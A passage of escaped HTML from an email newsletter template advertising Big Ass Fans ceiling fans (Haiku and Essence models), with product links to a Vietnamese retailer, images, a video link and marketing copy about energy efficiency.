role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-weight: 700; color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\"><strong>Model: Haiku 52\\/60 inch - Moso Bambo Airfoils<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #c97a14; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\" target=\\\"_blank\\\"><strong><span style=\\\"font-size: 14px; line-height: 19.6px; font-family: Lato, sans-serif;\\\">R e a d\\u00a0 \\u00a0M o r e &gt;&gt;<\\/span><\\/strong><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_image_4\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 8px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122680334-h-3.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 80%;max-width: 145.6px;\\\" width=\\\"145.6\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-weight: 700; color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\"><strong>Mode: Essence - Aluminium Airfoils<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #c97a14; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/essence\\\" target=\\\"_blank\\\"><strong><span style=\\\"font-size: 14px; line-height: 19.6px; font-family: Lato, sans-serif;\\\">R e a d\\u00a0 \\u00a0M o r e &gt;&gt;<\\/span><\\/strong><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 0px 0px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002000922-vvb.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #cc7202;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #cc7202;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122312096-haiku-logo.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">No fan manufacturer goes to greater lengths to create energy-efficient products than Big Ass Fans. It\\u2019s why businesses worldwide use our fans to cut heating and cooling costs by up to 30% and why designers rely on our ENERGY STAR\\u00ae-rated ceiling fan models to meet the growing demand for sustainable, LEED-certified projects.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 0px 40px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002319908-vvb2.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #727171; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>SMART CEILING FAN, SMART MODES<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"line-height: 150%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 150%;\\\">Haiku can mimic a gentle breeze, save energy, adjust for optimal sleep, and run on a timer\\u2014all through the included remote or the Big Ass Fans Haiku mobile app.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px; padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/youtu.be\\/AjYMiqVCkrw?lis\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677123215015-video_youtube_AjYMiqVCkrw.jpg\\\" alt=\\\"Video\\\" title=\\\"Video\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\" class=\\\"fullwidth\\\" \\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677298683634-quet_BR_code_2023.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 